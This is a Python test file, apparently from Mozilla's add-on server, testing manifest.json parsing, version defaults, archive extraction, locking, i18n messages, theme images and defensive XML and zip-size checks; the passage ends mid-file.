pytestmark = pytest.mark.django_db
def _touch(fname):
open(fname, 'a').close()
os.utime(fname, None)
class AppVersionsMixin:
@classmethod
def setUpTestData(cls):
cls.create_webext_default_versions()
@classmethod
def create_appversion(cls, name, version):
return AppVersion.objects.get_or_create(
application=amo.APPS[name].id, version=version
)[0]
@classmethod
def create_webext_default_versions(cls):
cls.create_appversion('firefox', '36.0') # Incompatible with webexts.
cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MIN_VERSION)
cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MAX_VERSION)
cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MIN_VERSION_NO_ID)
cls.create_appversion('android', amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID)
cls.create_appversion('android', amo.DEFAULT_WEBEXT_MAX_VERSION)
cls.create_appversion('firefox', amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
cls.create_appversion('android', amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
cls.create_appversion('firefox', amo.DEFAULT_WEBEXT_MIN_VERSION_MV3_FIREFOX)
cls.create_appversion('android', amo.DEFAULT_WEBEXT_MIN_VERSION_MV3_ANDROID)
class TestExtractor(AppVersionsMixin, TestCase):
def test_no_manifest(self):
fake_zip = utils.make_xpi({'dummy': 'dummy'})
with self.assertRaises(utils.NoManifestFound) as exc:
utils.Extractor.parse(fake_zip)
assert isinstance(exc.exception, forms.ValidationError)
assert exc.exception.message == ('No manifest.json found')
@mock.patch('olympia.files.utils.ManifestJSONExtractor')
def test_parse_manifest_json(self, manifest_json_extractor):
fake_zip = utils.make_xpi({'manifest.json': ''})
utils.Extractor.parse(fake_zip)
assert manifest_json_extractor.called
@mock.patch('olympia.files.utils.os.path.getsize')
def test_static_theme_max_size(self, getsize_mock):
getsize_mock.return_value = settings.MAX_STATICTHEME_SIZE
manifest = utils.ManifestJSONExtractor('/fake_path', '{"theme": {}}').parse()
# Calling to check it doesn't raise.
assert utils.check_xpi_info(manifest, xpi_file=mock.Mock())
# Increase the size though and it should raise an error.
getsize_mock.return_value = settings.MAX_STATICTHEME_SIZE + 1
with pytest.raises(forms.ValidationError) as exc:
utils.check_xpi_info(manifest, xpi_file=mock.Mock())
assert exc.value.message == 'Maximum size for WebExtension themes is 7.0 MB.'
# Double-check that only static themes are size-limited
manifest = utils.ManifestJSONExtractor('/fake_path', '{}').parse()
assert utils.check_xpi_info(manifest, xpi_file=mock.Mock())
class TestManifestJSONExtractor(AppVersionsMixin, TestCase):
def parse(self, base_data):
return utils.ManifestJSONExtractor('/fake_path', json.dumps(base_data)).parse()
def test_instanciate_without_data(self):
"""Without data, we load the data from the file path."""
data = {'id': 'some-id'}
fake_zip = utils.make_xpi({'manifest.json': json.dumps(data)})
extractor = utils.ManifestJSONExtractor(zipfile.ZipFile(fake_zip))
assert extractor.data == data
def test_guid_from_applications(self):
"""Use applications>gecko>id for the guid."""
assert (
self.parse({'applications': {'gecko': {'id': 'some-id'}}})['guid']
== 'some-id'
)
def test_guid_from_browser_specific_settings(self):
"""Use applications>gecko>id for the guid."""
assert (
self.parse({'browser_specific_settings': {'gecko': {'id': 'some-id'}}})[
'guid'
]
== 'some-id'
)
def test_name_for_guid_if_no_id(self):
"""Don't use the name for the guid if there is no id."""
assert self.parse({'name': 'addon-name'})['guid'] is None
def test_type(self):
"""manifest.json addons are always ADDON_EXTENSION."""
assert self.parse({})['type'] == amo.ADDON_EXTENSION
def test_name(self):
"""Use name for the name."""
assert self.parse({'name': 'addon-name'})['name'] == 'addon-name'
def test_version(self):
"""Use version for the version."""
assert self.parse({'version': '23.0.1'})['version'] == '23.0.1'
def test_homepage(self):
"""Use homepage_url for the homepage."""
assert (
self.parse({'homepage_url': 'http://my-addon.org'})['homepage']
== 'http://my-addon.org'
)
def test_summary(self):
"""Use description for the summary."""
assert self.parse({'description': 'An addon.'})['summary'] == 'An addon.'
def test_invalid_strict_min_version(self):
data = {
'applications': {
'gecko': {
'strict_min_version': 'A',
'id': '@invalid_strict_min_version',
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)
assert exc.value.message == 'Lowest supported "strict_min_version" is 42.0.'
def test_unknown_strict_min_version(self):
data = {
'applications': {
'gecko': {
'strict_min_version': '76.0',
'id': '@unknown_strict_min_version',
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)
assert exc.value.message == ('Unknown "strict_min_version" 76.0 for Firefox')
def test_unknown_strict_max_version(self):
data = {
'applications': {
'gecko': {
'strict_max_version': '76.0',
'id': '@unknown_strict_max_version',
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)
assert exc.value.message == ('Unknown "strict_max_version" 76.0 for Firefox')
def test_strict_min_version_needs_to_be_higher_than_42_if_specified(self):
"""strict_min_version needs to be higher than 42.0 if specified."""
data = {
'applications': {
'gecko': {
'strict_min_version': '36.0',
'id': '@too_old_strict_min_version',
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)
assert exc.value.message == 'Lowest supported "strict_min_version" is 42.0.'
def test_apps_use_provided_versions(self):
"""Use the min and max versions if provided."""
firefox_min_version = self.create_appversion('firefox', '47.0')
firefox_max_version = self.create_appversion('firefox', '47.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=47.0',
'strict_max_version': '=47.*',
'id': '@random',
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min == firefox_min_version
assert app.max == firefox_max_version
# We have no way of specifying a different version for Android when an
# explicit version number is provided... That being said, we know that
# 47.0 is too low for Android, so we silently cap it at 48.0. That
# forces us to also change the max version for android.
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
assert app.max.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
def test_strict_min_version_100(self):
firefox_min_version = self.create_appversion('firefox', '100.0')
firefox_max_version = self.create_appversion('firefox', '100.*')
android_min_version = self.create_appversion('android', '100.0')
android_max_version = self.create_appversion('android', '100.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=100.0',
'strict_max_version': '=100.*',
'id': '@radioactive',
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min == firefox_min_version
assert apps[0].max == firefox_max_version
assert apps[1].appdata == amo.ANDROID
assert apps[1].min == android_min_version
assert apps[1].max == android_max_version
def test_apps_use_default_versions_if_none_provided(self):
"""Use the default min and max versions if none provided."""
data = {'applications': {'gecko': {'id': 'some-id'}}}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
        # But if 'browser_specific_settings' is used, the default min version is higher.
data = {'browser_specific_settings': {'gecko': {'id': 'some-id'}}}
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min.version == (amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == (amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
# And if mv3 then a higher min version again
data['manifest_version'] = 3
apps = self.parse(data)['apps']
assert len(apps) == 2
app = apps[0]
assert app.appdata == amo.FIREFOX
assert app.min.version == (amo.DEFAULT_WEBEXT_MIN_VERSION_MV3_FIREFOX)
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
app = apps[1]
assert app.appdata == amo.ANDROID
assert app.min.version == (amo.DEFAULT_WEBEXT_MIN_VERSION_MV3_ANDROID)
assert app.max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_is_webextension(self):
assert self.parse({})['is_webextension']
def test_allow_static_theme_waffle(self):
manifest = utils.ManifestJSONExtractor('/fake_path', '{"theme": {}}').parse()
utils.check_xpi_info(manifest)
assert self.parse({'theme': {}})['type'] == amo.ADDON_STATICTHEME
def test_extensions_dont_have_strict_compatibility(self):
assert self.parse({})['strict_compatibility'] is False
@mock.patch('olympia.addons.models.resolve_i18n_message')
def test_mozilla_trademark_disallowed(self, resolve_message):
resolve_message.return_value = 'Notify Mozilla'
addon = amo.tests.addon_factory()
file_obj = addon.current_version.all_files[0]
fixture = 'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi'
with amo.tests.copy_file(fixture, file_obj.file_path):
with pytest.raises(forms.ValidationError) as exc:
utils.parse_xpi(file_obj.file_path)
assert dict(exc.value.messages)['en-us'].startswith(
'Add-on names cannot contain the Mozilla or'
)
@mock.patch('olympia.addons.models.resolve_i18n_message')
def test_mozilla_trademark_for_prefix_allowed(self, resolve_message):
resolve_message.return_value = 'Notify for Mozilla'
addon = amo.tests.addon_factory()
file_obj = addon.current_version.all_files[0]
fixture = 'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi'
with amo.tests.copy_file(fixture, file_obj.file_path):
utils.parse_xpi(file_obj.file_path)
def test_apps_use_default_versions_if_applications_is_omitted(self):
"""
WebExtensions are allowed to omit `applications[/gecko]` and we
        previously skipped defaulting to any `AppVersion` when it is not
        defined. That resulted in none of our platforms being selectable.
See https://github.com/mozilla/addons-server/issues/2586 and
probably many others.
"""
data = {}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_NO_ID
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_handle_utf_bom(self):
manifest = b'\xef\xbb\xbf{"manifest_version": 2, "name": "..."}'
parsed = utils.ManifestJSONExtractor(None, manifest).parse()
assert parsed['name'] == '...'
def test_raise_error_if_no_optional_id_support(self):
"""
We only support optional ids in Firefox 48+ and will throw an error
otherwise.
"""
data = {
'applications': {
'gecko': {
'strict_min_version': '42.0',
'strict_max_version': '49.0',
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)['apps']
assert exc.value.message == 'Add-on ID is required for Firefox 47 and below.'
def test_comments_are_allowed(self):
json_string = """
{
// Required
"manifest_version": 2,
"name": "My Extension",
"version": "versionString",
// Recommended
"default_locale": "en",
"description": "A plain text description"
}
"""
manifest = utils.ManifestJSONExtractor('/fake_path', json_string).parse()
assert manifest['is_webextension'] is True
assert manifest.get('name') == 'My Extension'
def test_dont_skip_apps_because_of_strict_version_incompatibility(self):
# We shouldn't skip adding specific apps to the WebExtension
        # regardless of any potential incompatibility, e.g.
        # browser_specific_settings is only supported from Firefox 48.0
        # onwards, so if the user specifies a strict_min_version of 42.0
        # we shouldn't skip the app because of that. Instead we override the
        # value with the known min version that started supporting it.
data = {
'browser_specific_settings': {
'gecko': {'strict_min_version': '42.0', 'id': '@random'}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (amo.DEFAULT_WEBEXT_MIN_VERSION_BROWSER_SPECIFIC)
def test_devtools_page(self):
json_string = """
{
// Required
"manifest_version": 2,
"name": "My Extension",
"version": "versionString",
// Recommended
"default_locale": "en",
"description": "A plain text description",
"devtools_page": "devtools/my-page.html"
}
"""
parsed_data = utils.ManifestJSONExtractor('/fake_path', json_string).parse()
assert parsed_data['devtools_page'] == 'devtools/my-page.html'
def test_version_not_string(self):
"""Test parsing doesn't fail if version is not a string - that error
should be handled downstream by the linter."""
data = {'version': 42}
assert self.parse(data)['version'] == '42'
data = {'version': 42.0}
assert self.parse(data)['version'] == '42.0'
# These are even worse, but what matters is that version stays a string
# in the result.
data = {'version': {}}
assert self.parse(data)['version'] == '{}'
data = {'version': []}
assert self.parse(data)['version'] == '[]'
data = {'version': None}
assert self.parse(data)['version'] == 'None'
class TestLanguagePackAndDictionaries(AppVersionsMixin, TestCase):
def test_parse_langpack(self):
self.create_appversion('firefox', '60.0')
self.create_appversion('firefox', '60.*')
self.create_appversion('android', '60.0')
self.create_appversion('android', '60.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=60.0',
'strict_max_version': '=60.*',
'id': '@langp',
}
},
'langpack_id': 'foo',
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json.dumps(data)
).parse()
assert parsed_data['type'] == amo.ADDON_LPAPP
assert parsed_data['strict_compatibility'] is True
assert parsed_data['is_webextension'] is True
apps = parsed_data['apps']
assert len(apps) == 1 # Langpacks are not compatible with android.
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '60.0'
assert apps[0].max.version == '60.*'
def test_parse_langpack_not_targeting_versions_explicitly(self):
data = {'applications': {'gecko': {'id': '@langp'}}, 'langpack_id': 'foo'}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json.dumps(data)
).parse()
assert parsed_data['type'] == amo.ADDON_LPAPP
assert parsed_data['strict_compatibility'] is True
assert parsed_data['is_webextension'] is True
apps = parsed_data['apps']
assert len(apps) == 1 # Langpacks are not compatible with android.
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '42.0'
# The linter should force the langpack to have a strict_max_version,
# so the value here doesn't matter much.
assert apps[0].max.version == '*'
def test_parse_dictionary(self):
self.create_appversion('firefox', '61.0')
data = {
'applications': {'gecko': {'id': '@dict'}},
'dictionaries': {'en-US': '/path/to/en-US.dic'},
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path', json.dumps(data)
).parse()
assert parsed_data['type'] == amo.ADDON_DICT
assert parsed_data['strict_compatibility'] is False
assert parsed_data['is_webextension'] is True
assert parsed_data['target_locale'] == 'en-US'
apps = parsed_data['apps']
assert len(apps) == 1 # Dictionaries are not compatible with android.
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == '61.0'
assert apps[0].max.version == '*'
def test_parse_broken_dictionary(self):
data = {'dictionaries': {}}
with self.assertRaises(forms.ValidationError):
utils.ManifestJSONExtractor('/fake_path', json.dumps(data)).parse()
def test_check_xpi_info_langpack_submission_restrictions(self):
user = user_factory()
self.create_appversion('firefox', '60.0')
self.create_appversion('firefox', '60.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=60.0',
'strict_max_version': '=60.*',
'id': '@langp',
}
},
'langpack_id': 'foo',
}
parsed_data = utils.ManifestJSONExtractor(
'/fake_path.xpi', json.dumps(data)
).parse()
with self.assertRaises(ValidationError):
# Regular users aren't allowed to submit langpacks.
utils.check_xpi_info(parsed_data, xpi_file=mock.Mock(), user=user)
# Shouldn't raise for users with proper permissions
self.grant_permission(user, ':'.join(amo.permissions.LANGPACK_SUBMIT))
utils.check_xpi_info(parsed_data, xpi_file=mock.Mock(), user=user)
class TestManifestJSONExtractorStaticTheme(TestManifestJSONExtractor):
def parse(self, base_data):
if 'theme' not in base_data.keys():
base_data.update(theme={})
return super().parse(base_data)
def test_type(self):
assert self.parse({})['type'] == amo.ADDON_STATICTHEME
def test_apps_use_default_versions_if_applications_is_omitted(self):
"""
Override this because static themes have a higher default version.
"""
data = {}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_apps_use_default_versions_if_none_provided(self):
"""Use the default min and max versions if none provided."""
data = {'applications': {'gecko': {'id': 'some-id'}}}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
def test_apps_use_provided_versions(self):
"""Use the min and max versions if provided."""
firefox_min_version = self.create_appversion('firefox', '66.0')
firefox_max_version = self.create_appversion('firefox', '66.*')
android_min_version = self.create_appversion('android', '66.0')
android_max_version = self.create_appversion('android', '66.*')
data = {
'applications': {
'gecko': {
'strict_min_version': '>=66.0',
'strict_max_version': '=66.*',
'id': '@random',
}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min == firefox_min_version
assert apps[0].max == firefox_max_version
assert apps[1].appdata == amo.ANDROID
assert apps[1].min == android_min_version
assert apps[1].max == android_max_version
def test_theme_json_extracted(self):
# Check theme data is extracted from the manifest and returned.
data = {'theme': {'colors': {'tab_background_text': '#3deb60'}}}
assert self.parse(data)['theme'] == data['theme']
def test_unknown_strict_max_version(self):
data = {
'applications': {
'gecko': {
'strict_max_version': '76.0',
'id': '@unknown_strict_max_version',
}
}
}
with pytest.raises(forms.ValidationError) as exc:
self.parse(data)
assert exc.value.message == ('Unknown "strict_max_version" 76.0 for Firefox')
def test_dont_skip_apps_because_of_strict_version_incompatibility(self):
# In the parent class this method would bump the min_version to 48.0
# because that's the first version to support
# browser_specific_settings, but in static themes we bump it even
# higher because of the minimum version when we started supporting
# static themes themselves.
data = {
'browser_specific_settings': {
'gecko': {'strict_min_version': '42.0', 'id': '@random'}
}
}
apps = self.parse(data)['apps']
assert len(apps) == 2
assert apps[0].appdata == amo.FIREFOX
assert apps[0].min.version == (amo.DEFAULT_STATIC_THEME_MIN_VERSION_FIREFOX)
assert apps[0].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
assert apps[1].appdata == amo.ANDROID
assert apps[1].min.version == (amo.DEFAULT_STATIC_THEME_MIN_VERSION_ANDROID)
assert apps[1].max.version == amo.DEFAULT_WEBEXT_MAX_VERSION
@pytest.mark.parametrize(
'filename, expected_files',
[
(
'webextension_no_id.xpi',
[
'README.md',
'beasts',
'button',
'content_scripts',
'manifest.json',
'popup',
],
),
(
'webextension_no_id.zip',
[
'README.md',
'beasts',
'button',
'content_scripts',
'manifest.json',
'popup',
],
),
(
'webextension_no_id.tar.gz',
[
'README.md',
'beasts',
'button',
'content_scripts',
'manifest.json',
'popup',
],
),
(
'webextension_no_id.tar.bz2',
[
'README.md',
'beasts',
'button',
'content_scripts',
'manifest.json',
'popup',
],
),
],
)
def test_extract_extension_to_dest(filename, expected_files):
extension_file = f'src/olympia/files/fixtures/files/{filename}'
with mock.patch('olympia.files.utils.os.fsync') as fsync_mock:
temp_folder = utils.extract_extension_to_dest(extension_file)
assert sorted(os.listdir(temp_folder)) == expected_files
# fsync isn't called by default
assert not fsync_mock.called
@pytest.mark.parametrize(
'filename',
[
'webextension_no_id.xpi',
'webextension_no_id.zip',
'webextension_no_id.tar.bz2',
'webextension_no_id.tar.gz',
],
)
def test_extract_extension_to_dest_call_fsync(filename):
extension_file = f'src/olympia/files/fixtures/files/{filename}'
with mock.patch('olympia.files.utils.os.fsync') as fsync_mock:
utils.extract_extension_to_dest(extension_file, force_fsync=True)
# fsync isn't called by default
assert fsync_mock.called
def test_extract_extension_to_dest_non_existing_archive():
extension_file = 'src/olympia/files/fixtures/files/doesntexist.zip'
with mock.patch('olympia.files.utils.shutil.rmtree') as mock_rmtree:
with pytest.raises(FileNotFoundError):
utils.extract_extension_to_dest(extension_file)
# Make sure we are cleaning up our temporary directory if possible
assert mock_rmtree.called
def test_extract_extension_to_dest_invalid_archive():
extension_file = 'src/olympia/files/fixtures/files/invalid-cp437-encoding.xpi'
with mock.patch('olympia.files.utils.shutil.rmtree') as mock_rmtree:
with pytest.raises(forms.ValidationError):
utils.extract_extension_to_dest(extension_file)
# Make sure we are cleaning up our temporary directory if possible
assert mock_rmtree.called
@pytest.fixture
def file_obj():
addon = amo.tests.addon_factory()
addon.update(guid='xxxxx')
version = addon.current_version
return version.all_files[0]
@pytestmark
def test_bump_version_in_manifest_json(file_obj):
AppVersion.objects.create(
application=amo.FIREFOX.id, version=amo.DEFAULT_WEBEXT_MIN_VERSION
)
AppVersion.objects.create(
application=amo.FIREFOX.id, version=amo.DEFAULT_WEBEXT_MAX_VERSION
)
AppVersion.objects.create(
application=amo.ANDROID.id, version=amo.DEFAULT_WEBEXT_MIN_VERSION_ANDROID
)
AppVersion.objects.create(
application=amo.ANDROID.id, version=amo.DEFAULT_WEBEXT_MAX_VERSION
)
with amo.tests.copy_file(
'src/olympia/files/fixtures/files/webextension.xpi', file_obj.file_path
):
utils.update_version_number(file_obj, '0.0.1.1-signed')
parsed = utils.parse_xpi(file_obj.file_path)
assert parsed['version'] == '0.0.1.1-signed'
def test_extract_translations_simple(file_obj):
extension = 'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi'
with amo.tests.copy_file(extension, file_obj.file_path):
messages = utils.extract_translations(file_obj)
assert list(sorted(messages.keys())) == [
'de',
'en-US',
'ja',
'nb-NO',
'nl',
'ru',
'sv-SE',
]
@mock.patch('olympia.files.utils.zipfile.ZipFile.read')
def test_extract_translations_fail_silent_invalid_file(read_mock, file_obj):
extension = 'src/olympia/files/fixtures/files/notify-link-clicks-i18n.xpi'
with amo.tests.copy_file(extension, file_obj.file_path):
read_mock.side_effect = KeyError
# Does not raise an exception
utils.extract_translations(file_obj)
read_mock.side_effect = IOError
        # Does not raise an exception either
utils.extract_translations(file_obj)
        # We don't fail on invalid JSON either; that is the addons-linter's domain
read_mock.side_effect = ValueError
utils.extract_translations(file_obj)
# But everything else...
read_mock.side_effect = TypeError
with pytest.raises(TypeError):
utils.extract_translations(file_obj)
def test_get_all_files():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
assert utils.get_all_files(tempdir) == [
os.path.join(tempdir, 'dir1'),
os.path.join(tempdir, 'dir1', 'foo2'),
os.path.join(tempdir, 'foo1'),
]
shutil.rmtree(tempdir)
assert not os.path.exists(tempdir)
def test_get_all_files_strip_prefix_no_prefix_silent():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
# strip_prefix alone doesn't do anything.
assert utils.get_all_files(tempdir, strip_prefix=tempdir) == [
os.path.join(tempdir, 'dir1'),
os.path.join(tempdir, 'dir1', 'foo2'),
os.path.join(tempdir, 'foo1'),
]
def test_get_all_files_prefix():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
# strip_prefix alone doesn't do anything.
assert utils.get_all_files(tempdir, prefix='/foo/bar') == [
'/foo/bar' + os.path.join(tempdir, 'dir1'),
'/foo/bar' + os.path.join(tempdir, 'dir1', 'foo2'),
'/foo/bar' + os.path.join(tempdir, 'foo1'),
]
def test_get_all_files_prefix_with_strip_prefix():
tempdir = tempfile.mkdtemp(dir=settings.TMP_PATH)
os.mkdir(os.path.join(tempdir, 'dir1'))
_touch(os.path.join(tempdir, 'foo1'))
_touch(os.path.join(tempdir, 'dir1', 'foo2'))
# strip_prefix alone doesn't do anything.
result = utils.get_all_files(tempdir, strip_prefix=tempdir, prefix='/foo/bar')
assert result == [
os.path.join('/foo', 'bar', 'dir1'),
os.path.join('/foo', 'bar', 'dir1', 'foo2'),
os.path.join('/foo', 'bar', 'foo1'),
]
def test_lock_with_lock_attained():
with utils.lock(settings.TMP_PATH, 'test-lock-lock2') as lock_attained:
assert lock_attained
@contextlib.contextmanager
def _run_lock_holding_process(lock_name, sleep):
def _other_process_holding_lock():
with utils.lock(settings.TMP_PATH, lock_name) as lock_attained:
assert lock_attained
time.sleep(sleep)
other_process = multiprocessing.Process(target=_other_process_holding_lock)
other_process.start()
# Give the process some time to acquire the lock
time.sleep(0.2)
yield other_process
other_process.join()
def test_lock_timeout():
with _run_lock_holding_process('test-lock-lock3', sleep=2):
# Waiting for 3 seconds allows us to attain the lock from the parent
# process.
lock = utils.lock(settings.TMP_PATH, 'test-lock-lock3', timeout=3)
with lock as lock_attained:
assert lock_attained
with _run_lock_holding_process('test-lock-lock3', sleep=2):
# Waiting only 1 second fails to acquire the lock
lock = utils.lock(settings.TMP_PATH, 'test-lock-lock3', timeout=1)
with lock as lock_attained:
assert not lock_attained
class TestResolvei18nMessage:
def test_no_match(self):
assert utils.resolve_i18n_message('foo', {}, '') == 'foo'
def test_locale_found(self):
messages = {'de': {'foo': {'message': 'bar'}}}
result = utils.resolve_i18n_message('__MSG_foo__', messages, 'de')
assert result == 'bar'
def test_uses_default_locale(self):
messages = {'en-US': {'foo': {'message': 'bar'}}}
result = utils.resolve_i18n_message('__MSG_foo__', messages, 'de', 'en')
assert result == 'bar'
def test_no_locale_match(self):
        # Neither `locale` nor `default_locale` is found, so "message" is
        # returned unchanged
messages = {'fr': {'foo': {'message': 'bar'}}}
result = utils.resolve_i18n_message('__MSG_foo__', messages, 'de', 'en')
assert result == '__MSG_foo__'
def test_field_not_set(self):
"""Make sure we don't fail on messages that are `None`
Fixes https://github.com/mozilla/addons-server/issues/3067
"""
result = utils.resolve_i18n_message(None, {}, 'de', 'en')
assert result is None
def test_field_no_string(self):
"""Make sure we don't fail on messages that are no strings"""
result = utils.resolve_i18n_message([], {}, 'de', 'en')
assert result == []
def test_corrects_locales(self):
messages = {'en-US': {'foo': {'message': 'bar'}}}
result = utils.resolve_i18n_message('__MSG_foo__', messages, 'en')
assert result == 'bar'
def test_ignore_wrong_format(self):
messages = {'en-US': {'foo': 'bar'}}
result = utils.resolve_i18n_message('__MSG_foo__', messages, 'en')
assert result == '__MSG_foo__'
class TestXMLVulnerabilities(TestCase):
"""Test a few known vulnerabilities to make sure
our defusedxml patching is applied automatically.
This doesn't replicate all defusedxml tests.
"""
def test_lxml_XMLParser_no_resolve_entities(self):
with pytest.raises(NotSupportedError):
lxml.etree.XMLParser(resolve_entities=True)
# not setting it works
lxml.etree.XMLParser()
# Setting it explicitly to `False` is fine too.
lxml.etree.XMLParser(resolve_entities=False)
class TestGetBackgroundImages(TestCase):
file_obj = os.path.join(
settings.ROOT, 'src/olympia/devhub/tests/addons/static_theme.zip'
)
file_obj_dep = os.path.join(
settings.ROOT, 'src/olympia/devhub/tests/addons/static_theme_deprecated.zip'
)
def test_get_background_images(self):
data = {'images': {'theme_frame': 'weta.png'}}
images = utils.get_background_images(self.file_obj, data)
assert 'weta.png' in images
assert len(images.items()) == 1
assert len(images['weta.png']) == 126447
def test_get_background_deprecated(self):
data = {'images': {'headerURL': 'weta.png'}}
images = utils.get_background_images(self.file_obj_dep, data)
assert 'weta.png' in images
assert len(images.items()) == 1
assert len(images['weta.png']) == 126447
def test_get_background_images_no_theme_data_provided(self):
images = utils.get_background_images(self.file_obj, theme_data=None)
assert 'weta.png' in images
assert len(images.items()) == 1
assert len(images['weta.png']) == 126447
def test_get_background_images_missing(self):
data = {'images': {'theme_frame': 'missing_file.png'}}
images = utils.get_background_images(self.file_obj, data)
assert not images
def test_get_background_images_not_image(self):
self.file_obj = os.path.join(
settings.ROOT, 'src/olympia/devhub/tests/addons/static_theme_non_image.zip'
)
data = {'images': {'theme_frame': 'not_an_image.js'}}
images = utils.get_background_images(self.file_obj, data)
assert not images
def test_get_background_images_with_additional_imgs(self):
self.file_obj = os.path.join(
settings.ROOT, 'src/olympia/devhub/tests/addons/static_theme_tiled.zip'
)
data = {
'images': {
'theme_frame': 'empty.png',
'additional_backgrounds': [
'transparent.gif',
'missing_&_ignored.png',
'weta_for_tiling.png',
],
}
}
images = utils.get_background_images(self.file_obj, data)
assert len(images.items()) == 3
assert len(images['empty.png']) == 332
assert len(images['transparent.gif']) == 42
assert len(images['weta_for_tiling.png']) == 93371
# And again but only with the header image
images = utils.get_background_images(self.file_obj, data, header_only=True)
assert len(images.items()) == 1
assert len(images['empty.png']) == 332
@pytest.mark.parametrize(
'value, expected',
[
(1, '1/1/1'),
(1, '1/1/1'),
(12, '2/12/12'),
(123, '3/23/123'),
(123456789, '9/89/123456789'),
],
)
def test_id_to_path(value, expected):
assert utils.id_to_path(value) == expected
class TestSafeZip(TestCase):
def test_raises_error_for_invalid_webextension_xpi(self):
with pytest.raises(zipfile.BadZipFile):
utils.SafeZip(get_addon_file('invalid_webextension.xpi'))
def test_raises_validation_error_when_uncompressed_size_is_too_large(self):
with override_settings(MAX_ZIP_UNCOMPRESSED_SIZE=1000):
with pytest.raises(forms.ValidationError):
# total uncompressed size of this xpi is 126kb
utils.SafeZip(get_addon_file('mozilla_static_theme.zip'))
class TestArchiveMemberValidator(TestCase):
